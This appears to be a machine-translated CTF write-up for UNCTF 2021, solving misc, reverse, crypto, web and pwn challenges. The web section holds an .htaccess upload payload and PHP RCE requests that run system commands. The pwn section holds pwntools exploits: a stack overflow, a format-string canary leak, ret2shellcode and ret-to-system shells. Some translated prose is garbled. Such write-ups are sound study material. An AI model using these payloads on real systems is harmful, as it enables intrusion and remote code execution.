Misc
Simple log audit
Before updating the attachment, the flag was in the description. The update was put in the attachment at 18:00 p.m. on November 29
In short, there are three base64 strings in total. You can see the flag after decryption. Do you want to / forget the flag
UNCTF{CTF?YouShouJiuXing}
telecommunication fraud
Variant Caesar
s = 'qi]m^roVibdVbXUU`h' # f = 'unctf' for i in range(len(s)): print(chr(ord(s[i]) +4+i),end='')
unctf{yauoreright}
Lead the flow, happy
Modify jpg height
UNCTF{BellalaBella}
LPL
An error is reported when PNG is put into 010, and the CRC value is exactly 000000??, hex gets the decompression password
hex 4544476e622121, the password is EDGnb!!
After unlocking, I gave a link and time to station b, either looking for the comment area or looking for the bullet screen, and found the flag in the comment area
flag{LpL_zgbr_rNg_eDg777}
Handstand Shampoo
Given a string of hexadecimal, use notepad++ hex to get the inverted jpg. Python writes a script and turns it back
open('flag.jpg','wb').write(open('key.txt','rb').read()[::-1])
Then I found that FFD8 was changed to D8FF, just change it back, and then I found the upper left corner
So I went to see the data section
After decoding, I'm serious. It's really unnecessary to change the Buddha's saying into a day..
unctf{it_is_easy_right?}
Re
ezlogin
Just find the key code and reverse it
s = 'pqsd`fl{zmpZsag}wdYVkUNC' for i in range(5): for j in range(3): print(chr(ord(s[i+j*8])^22),end='')
flag{refOrL@ve}
rejunk
A pile of garbage is piled up. Just look at the key points directly
s = 'WQGULxb>2:ooh95=\'\'twk' for i in range(len(s)): print(chr((ord(s[i])^i)-2),end='')
UNCTF{b781cbb29054db}
py_trade
Bytecode, it's over
# true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49] flag = 'AAAAAAAAAAAAAAAAAA' num = [0]*18 k = 0 for i in range(len(flag)): num[i] = (ord(flag[i])+i)^(k%3+1) num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1) k += 1 print(num)
Then it is found that each bit is independent. Just look at its value after running
true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49] flag = ['A']*18 num = [0]*18 k = 0 for n in range(len(flag)): for j in range(32,128): flag[n] = chr(j) for i in range(len(flag)): num[i] = (ord(flag[i])+i)^(k%3+1) num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1) k += 1 if(true_flag[n] == num[n]): flag[n] = chr(j) break # print(num) print(''.join(flag)) #py_Trad3_1s_fuNny!
Just pack UNCTF
UNCTF{py_Trad3_1s_fuNny!}
Crypto
easy_rsa
q= 9961202707366965556741565662110710902919441271996809241009358666778850435448710324711706845973820669201482939820488174382325795134659313309606698334978471 p= 12525187149887628510447403881107442078833803097302579419605689530714690308437476207855511625840027119860834633695330551080761572835309850579517639206740101 c= 28587419802025513525354713621431206010395084854419372005671024739235625817936539010481222419824634956610184430308528941304950093228826213143262329902946812513518444587906469224383320964300417189270202019231856531012143472434842753891213128487132962453421971000901646523331476667655739056951415917218673801225 e = 65537 import gmpy2 import binascii n = p*q L = (p-1)*(q-1) d = gmpy2.invert(e,L) m = gmpy2.powmod(c,d,n) print(binascii.unhexlify(hex(m)[2:]))
UNCTF{Th1s_1s_f1ag_f0r_unctf_2021!!}
Exploring medieval castles
Caesar + base64 + fence
UNCTF{subscribe_to_Xiangwandamowang}
Analyze badusb flow
This question doesn't put misc grass
f = open('separate.txt','r').readlines() mappings = { 0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G", 0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-", 0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'", 0x36:",", 0x37:"." } for i in range(len(f)): num = int(f[i][2:4],16) if(f[i][0] == '2'): if(num in mappings): print(mappings[num].upper(),end='') else: if (num in mappings): print(mappings[num].lower(), end='') #output:UNCTF[Y0u-Are-very-n1ce]
[] can be replaced by {}, because press shift
UNCTF{Y0u-Are-very-n1ce}
baby_rsa
dp leakage
import gmpy2 import libnum n= 27023180567533176673625876001733765250439008888496677405372613659387969480500400831799338479404533734632060401129194207025095826786316107611502577395964365591899893794206238112244571942694129959717225168573059987542436467778426312967832431595178558711258027999897974942046398583397445299861338203860420721585460676138091828032223153425728023656897880166788811969523526091221520293020106530587453637600349533427641518473788620430866128331962450325767202417824455886116760280239705754222948387172102353564657340216229891342124971948458724351338597649821310431397426705701275774039588035776573373417654649168810548916141 c= 3489599657527403893851973553294684608504140532554562294027722218597464669848608337663997115805201027340092733823019661706872544231209523772845492398492677185660213963118144668038183924970370481476141221609706208064428560732214361469135212057355342825193598971775551833240699393482839422273480793244841531126642199202744610656153155545415859410361595564197685655133074582118230993519133935533313364233668337427608419528430102794052261190930670933657287272452581248934890029409559234507626012423255430699687038808658327174609660874748540185589263800447650242593224189976058739054174360024536594384447518687126891675059 e= 65537 p = gmpy2.gcd(n,c) q = n//p phi = (q-1)*(p-1) d = gmpy2.invert(e,phi) m = pow(c,d,n) print(libnum.n2s(int(m//p)))
Telecom fraud pro
I feel obvious rot47... (?
Although I still subtract first and find that there is a difference of 64 between unctf and unctf,
Anyway rot47, move 64 out
unctf{5Yir6Kej5LqG77yM6YKj5Liq5bCx5pivZmxhZw}
Don't solve the middle one. That's flag
Web
fuzz_md5
Replace unctf with null, double write bypass
Blow up an md5 beginning with 66666
import hashlib for i in range(9999999): data = str(i).encode() m = hashlib.md5(data) m = m.hexdigest() if(m[:5] == '66666'): print(i) #1004649
babywrite
https://www.anquanke.com/post/id/241147#h3-18
https://www.cnblogs.com/doherasyang/p/14571302.html
The original title was adapted and reported an error. I saw that it was apache middleware, so I used. htaccess to obtain the flag
The original question is POST. Here, GET line feed can be changed%0a
?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .ppt%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=mn.ppt" ?filename=mn.ppt&content=GIF89a12%0APD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
Finish
phpmysql
This is echo new d b u s e r ( db_user( dbu # ser(db_pwd); to execute the command
Exception handling is used to change the normal flow of the script when a specified error occurs. It is a built-in exception handling class in php
ReflectionClass or ReflectionMethod are common reflection classes, which can be understood as a class mapping
This can be used as the test site of ctfshow web109 to report an error to RCE. Although an error is reported, the internal commands have been executed. This class must have _toString() magic methods. Here, exception, mysqli, ReflectionClass, etc. can be used
POST:host=127.0.0.1&port=3306&pwd=system('ls /')&user=mysqli POST:host=127.0.0.1&port=3306&pwd=system('tac /fllllaaaaag')&user=mysqli
Pwn
magic_int
An int overflow and a stack overflow of puts
Put will count the newline character. I always + 8... In ret, but later I found that it was + 7
from pwn import * p = remote('node2.hackingfor.fun',30993) p.send('2147483648\x00') p.recv() payload = 'a'*(0x70+7)+p64(0x400781) p.sendline(payload) p.interactive()
fo
fmt hits canary and the stack overflows
from pwn import * p=remote('node2.hackingfor.fun',36767) context.log_level='debug' p.sendlineafter('you?\n','%17$p') p.recvuntil('0x') canary=int(p.recv(16),16) success('canary:'+hex(canary)) p.sendlineafter('wait for your good news...\n','a'*0x58+p64(canary)+p64(0)+p64(0x40080d)) p.interactive()
sc
ret2shellcode
from pwn import * p=remote('node2.hackingfor.fun',31483) context.arch='amd64' context.log_level='debug' p.sendlineafter('show me your Migic',str(asm(shellcraft.sh()))) p.sendlineafter('Have you finished?\n','a'*0x18+p64(0x601080)) p.interactive()
ezfsb
printf covers decimals and large numbers, and then the stack overflows to take the shell. printf format string covers small numbers and large numbers. It is available on wiki and can be learned by Mengxin
Then, after system('code '), call the read function, write out / bin/sh as the parameter of system, and call system('bin/sh')
from pwn import * elf = ELF('./pwn') context.log_level='debug' p = remote('node2.hackingfor.fun',32119) a_addr = 0x0804A050 p.recvuntil('hard!') # payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p' payload = 'aa%7$naa' + p32(a_addr) p.sendline(payload) p.recvuntil('right') p.recv() # payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p' p.sendline(fmtstr_payload(5,{0x0804A04D:0x22})) p.recvuntil('good') payload = 'a'*(0x74+4)+p32(elf.plt['read'])+p32(0x080486d9)+p32(0)+p32(0x804ab00)+p32(0x4)+p32(elf.plt['system'])+p32(0)+p32(0x804ab00) p.sendline(payload) p.interactive()